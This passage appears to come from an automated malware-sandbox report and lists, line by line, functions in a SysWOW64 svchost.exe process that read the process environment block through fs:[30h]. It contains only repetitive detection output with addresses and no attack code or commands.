Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03450310 mov ecx, dword ptr fs:[00000030h]	3_2_03450310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034EC3CD mov eax, dword ptr fs:[00000030h]	3_2_034EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034383C0 mov eax, dword ptr fs:[00000030h]	3_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034383C0 mov eax, dword ptr fs:[00000030h]	3_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034383C0 mov eax, dword ptr fs:[00000030h]	3_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034383C0 mov eax, dword ptr fs:[00000030h]	3_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B63C0 mov eax, dword ptr fs:[00000030h]	3_2_034B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DE3DB mov eax, dword ptr fs:[00000030h]	3_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DE3DB mov eax, dword ptr fs:[00000030h]	3_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DE3DB mov ecx, dword ptr fs:[00000030h]	3_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DE3DB mov eax, dword ptr fs:[00000030h]	3_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D43D4 mov eax, dword ptr fs:[00000030h]	3_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D43D4 mov eax, dword ptr fs:[00000030h]	3_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]	3_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]	3_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]	3_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]	3_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]	3_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]	3_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]	3_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034403E9 mov eax, dword ptr fs:[00000030h]	3_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	3_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	3_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	3_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034663FF mov eax, dword ptr fs:[00000030h]	3_2_034663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342E388 mov eax, dword ptr fs:[00000030h]	3_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342E388 mov eax, dword ptr fs:[00000030h]	3_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342E388 mov eax, dword ptr fs:[00000030h]	3_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345438F mov eax, dword ptr fs:[00000030h]	3_2_0345438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345438F mov eax, dword ptr fs:[00000030h]	3_2_0345438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03428397 mov eax, dword ptr fs:[00000030h]	3_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03428397 mov eax, dword ptr fs:[00000030h]	3_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03428397 mov eax, dword ptr fs:[00000030h]	3_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B8243 mov eax, dword ptr fs:[00000030h]	3_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B8243 mov ecx, dword ptr fs:[00000030h]	3_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342A250 mov eax, dword ptr fs:[00000030h]	3_2_0342A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03436259 mov eax, dword ptr fs:[00000030h]	3_2_03436259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034EA250 mov eax, dword ptr fs:[00000030h]	3_2_034EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034EA250 mov eax, dword ptr fs:[00000030h]	3_2_034EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03434260 mov eax, dword ptr fs:[00000030h]	3_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03434260 mov eax, dword ptr fs:[00000030h]	3_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03434260 mov eax, dword ptr fs:[00000030h]	3_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342826B mov eax, dword ptr fs:[00000030h]	3_2_0342826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]	3_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]	3_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]	3_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]	3_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]	3_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]	3_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]	3_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]	3_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]	3_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]	3_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]	3_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E0274 mov eax, dword ptr fs:[00000030h]	3_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342823B mov eax, dword ptr fs:[00000030h]	3_2_0342823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034402E1 mov eax, dword ptr fs:[00000030h]	3_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034402E1 mov eax, dword ptr fs:[00000030h]	3_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034402E1 mov eax, dword ptr fs:[00000030h]	3_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346E284 mov eax, dword ptr fs:[00000030h]	3_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346E284 mov eax, dword ptr fs:[00000030h]	3_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B0283 mov eax, dword ptr fs:[00000030h]	3_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B0283 mov eax, dword ptr fs:[00000030h]	3_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B0283 mov eax, dword ptr fs:[00000030h]	3_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034402A0 mov eax, dword ptr fs:[00000030h]	3_2_034402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034402A0 mov eax, dword ptr fs:[00000030h]	3_2_034402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C62A0 mov eax, dword ptr fs:[00000030h]	3_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C62A0 mov ecx, dword ptr fs:[00000030h]	3_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C62A0 mov eax, dword ptr fs:[00000030h]	3_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C62A0 mov eax, dword ptr fs:[00000030h]	3_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C62A0 mov eax, dword ptr fs:[00000030h]	3_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C62A0 mov eax, dword ptr fs:[00000030h]	3_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C4144 mov eax, dword ptr fs:[00000030h]	3_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C4144 mov eax, dword ptr fs:[00000030h]	3_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C4144 mov ecx, dword ptr fs:[00000030h]	3_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C4144 mov eax, dword ptr fs:[00000030h]	3_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C4144 mov eax, dword ptr fs:[00000030h]	3_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342C156 mov eax, dword ptr fs:[00000030h]	3_2_0342C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C8158 mov eax, dword ptr fs:[00000030h]	3_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03436154 mov eax, dword ptr fs:[00000030h]	3_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03436154 mov eax, dword ptr fs:[00000030h]	3_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DE10E mov eax, dword ptr fs:[00000030h]	3_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DE10E mov ecx, dword ptr fs:[00000030h]	3_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DE10E mov eax, dword ptr fs:[00000030h]	3_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DE10E mov eax, dword ptr fs:[00000030h]	3_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DE10E mov ecx, dword ptr fs:[00000030h]	3_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DE10E mov eax, dword ptr fs:[00000030h]	3_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DE10E mov eax, dword ptr fs:[00000030h]	3_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DE10E mov ecx, dword ptr fs:[00000030h]	3_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DE10E mov eax, dword ptr fs:[00000030h]	3_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DE10E mov ecx, dword ptr fs:[00000030h]	3_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DA118 mov ecx, dword ptr fs:[00000030h]	3_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DA118 mov eax, dword ptr fs:[00000030h]	3_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DA118 mov eax, dword ptr fs:[00000030h]	3_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DA118 mov eax, dword ptr fs:[00000030h]	3_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034F0115 mov eax, dword ptr fs:[00000030h]	3_2_034F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03460124 mov eax, dword ptr fs:[00000030h]	3_2_03460124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034F61C3 mov eax, dword ptr fs:[00000030h]	3_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034F61C3 mov eax, dword ptr fs:[00000030h]	3_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	3_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	3_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]	3_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	3_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	3_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_035061E5 mov eax, dword ptr fs:[00000030h]	3_2_035061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034601F8 mov eax, dword ptr fs:[00000030h]	3_2_034601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03470185 mov eax, dword ptr fs:[00000030h]	3_2_03470185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034EC188 mov eax, dword ptr fs:[00000030h]	3_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034EC188 mov eax, dword ptr fs:[00000030h]	3_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D4180 mov eax, dword ptr fs:[00000030h]	3_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D4180 mov eax, dword ptr fs:[00000030h]	3_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B019F mov eax, dword ptr fs:[00000030h]	3_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B019F mov eax, dword ptr fs:[00000030h]	3_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B019F mov eax, dword ptr fs:[00000030h]	3_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B019F mov eax, dword ptr fs:[00000030h]	3_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342A197 mov eax, dword ptr fs:[00000030h]	3_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342A197 mov eax, dword ptr fs:[00000030h]	3_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342A197 mov eax, dword ptr fs:[00000030h]	3_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03432050 mov eax, dword ptr fs:[00000030h]	3_2_03432050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B6050 mov eax, dword ptr fs:[00000030h]	3_2_034B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345C073 mov eax, dword ptr fs:[00000030h]	3_2_0345C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B4000 mov ecx, dword ptr fs:[00000030h]	3_2_034B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]	3_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]	3_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]	3_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]	3_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]	3_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]	3_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]	3_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D2000 mov eax, dword ptr fs:[00000030h]	3_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0344E016 mov eax, dword ptr fs:[00000030h]	3_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0344E016 mov eax, dword ptr fs:[00000030h]	3_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0344E016 mov eax, dword ptr fs:[00000030h]	3_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0344E016 mov eax, dword ptr fs:[00000030h]	3_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342A020 mov eax, dword ptr fs:[00000030h]	3_2_0342A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342C020 mov eax, dword ptr fs:[00000030h]	3_2_0342C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C6030 mov eax, dword ptr fs:[00000030h]	3_2_034C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B20DE mov eax, dword ptr fs:[00000030h]	3_2_034B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]	3_2_0342A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034380E9 mov eax, dword ptr fs:[00000030h]	3_2_034380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B60E0 mov eax, dword ptr fs:[00000030h]	3_2_034B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342C0F0 mov eax, dword ptr fs:[00000030h]	3_2_0342C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034720F0 mov ecx, dword ptr fs:[00000030h]	3_2_034720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343208A mov eax, dword ptr fs:[00000030h]	3_2_0343208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C80A8 mov eax, dword ptr fs:[00000030h]	3_2_034C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034F60B8 mov eax, dword ptr fs:[00000030h]	3_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034F60B8 mov ecx, dword ptr fs:[00000030h]	3_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346674D mov esi, dword ptr fs:[00000030h]	3_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346674D mov eax, dword ptr fs:[00000030h]	3_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346674D mov eax, dword ptr fs:[00000030h]	3_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03430750 mov eax, dword ptr fs:[00000030h]	3_2_03430750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034BE75D mov eax, dword ptr fs:[00000030h]	3_2_034BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472750 mov eax, dword ptr fs:[00000030h]	3_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472750 mov eax, dword ptr fs:[00000030h]	3_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B4755 mov eax, dword ptr fs:[00000030h]	3_2_034B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03438770 mov eax, dword ptr fs:[00000030h]	3_2_03438770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]	3_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]	3_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]	3_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]	3_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]	3_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]	3_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]	3_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]	3_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]	3_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]	3_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]	3_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440770 mov eax, dword ptr fs:[00000030h]	3_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346C700 mov eax, dword ptr fs:[00000030h]	3_2_0346C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03430710 mov eax, dword ptr fs:[00000030h]	3_2_03430710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03460710 mov eax, dword ptr fs:[00000030h]	3_2_03460710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346C720 mov eax, dword ptr fs:[00000030h]	3_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346C720 mov eax, dword ptr fs:[00000030h]	3_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346273C mov eax, dword ptr fs:[00000030h]	3_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346273C mov ecx, dword ptr fs:[00000030h]	3_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346273C mov eax, dword ptr fs:[00000030h]	3_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AC730 mov eax, dword ptr fs:[00000030h]	3_2_034AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343C7C0 mov eax, dword ptr fs:[00000030h]	3_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B07C3 mov eax, dword ptr fs:[00000030h]	3_2_034B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034527ED mov eax, dword ptr fs:[00000030h]	3_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034527ED mov eax, dword ptr fs:[00000030h]	3_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034527ED mov eax, dword ptr fs:[00000030h]	3_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034BE7E1 mov eax, dword ptr fs:[00000030h]	3_2_034BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034347FB mov eax, dword ptr fs:[00000030h]	3_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034347FB mov eax, dword ptr fs:[00000030h]	3_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D678E mov eax, dword ptr fs:[00000030h]	3_2_034D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034307AF mov eax, dword ptr fs:[00000030h]	3_2_034307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E47A0 mov eax, dword ptr fs:[00000030h]	3_2_034E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0344C640 mov eax, dword ptr fs:[00000030h]	3_2_0344C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034F866E mov eax, dword ptr fs:[00000030h]	3_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034F866E mov eax, dword ptr fs:[00000030h]	3_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346A660 mov eax, dword ptr fs:[00000030h]	3_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346A660 mov eax, dword ptr fs:[00000030h]	3_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03462674 mov eax, dword ptr fs:[00000030h]	3_2_03462674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AE609 mov eax, dword ptr fs:[00000030h]	3_2_034AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0344260B mov eax, dword ptr fs:[00000030h]	3_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0344260B mov eax, dword ptr fs:[00000030h]	3_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0344260B mov eax, dword ptr fs:[00000030h]	3_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0344260B mov eax, dword ptr fs:[00000030h]	3_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0344260B mov eax, dword ptr fs:[00000030h]	3_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0344260B mov eax, dword ptr fs:[00000030h]	3_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0344260B mov eax, dword ptr fs:[00000030h]	3_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472619 mov eax, dword ptr fs:[00000030h]	3_2_03472619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0344E627 mov eax, dword ptr fs:[00000030h]	3_2_0344E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03466620 mov eax, dword ptr fs:[00000030h]	3_2_03466620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03468620 mov eax, dword ptr fs:[00000030h]	3_2_03468620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343262C mov eax, dword ptr fs:[00000030h]	3_2_0343262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]	3_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346A6C7 mov eax, dword ptr fs:[00000030h]	3_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	3_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	3_2_034AE6F2
